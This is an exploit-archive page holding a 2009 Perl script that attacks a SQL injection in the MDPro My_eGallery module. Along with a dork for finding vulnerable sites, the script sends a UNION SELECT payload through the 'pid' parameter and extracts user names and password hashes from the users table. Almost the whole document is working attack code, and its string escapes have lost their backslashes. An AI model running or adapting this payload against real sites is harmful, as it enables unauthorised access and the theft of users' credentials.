[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MDPro Module My_eGallery (pid) Remote SQL Injection Exploit
# Published : 2009-02-23
# Author : StAkeR
# Previous Title : taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability
# Next Title : phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability
#!/usr/bin/perl
<<read;
MDPro Module My_eGallery Remote SQL Injection Exploit
by s3rg3770 && yeat - staker[at]hotmail[dot]it
dork: inurl:module=My_eGallery pid
note: works regardless of php.ini settings.
read
use IO::Socket;
my ($host,$path,$id) = @ARGV;
if (@ARGV != 3)
{
print "n+-------------------------------------------------------+n".
"r| MDPro Module My_eGallery Remote SQL Injection Exploit |n".
"r+-------------------------------------------------------+n".
"rby yeat - staker[at]hotmail[dot]itn".
"nUsage: perl $0 host /path/ idn".
"nhost: localhostn".
"rpath: /mdpro/n".
"rid: 2n";
exit;
}
else
{
my ($packet,$inject,$content);
$inject = "index.php?module=My_eGallery&do=showpic&pid=-1".
"/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0".
",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7".
"230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0".
",0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*";
$socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp'
) or die $!;
$packet .= "GET /$inject HTTP/1.1rn";
$packet .= "Host: $hostrn";
$packet .= "User-Agent: Lynx (textmode)rn";
$packet .= "Connection: closernrn";
$socket->send($packet);
while (<$socket>) {
$content .= $_;
}
close($socket);
if ($content =~ /<r0x>(.+?)<r0x>/i) {
print "Exploit Successful: $1n";
}
else {
print "Exploit Failed.n";
}
}
# www.Syue.com [2009-02-23]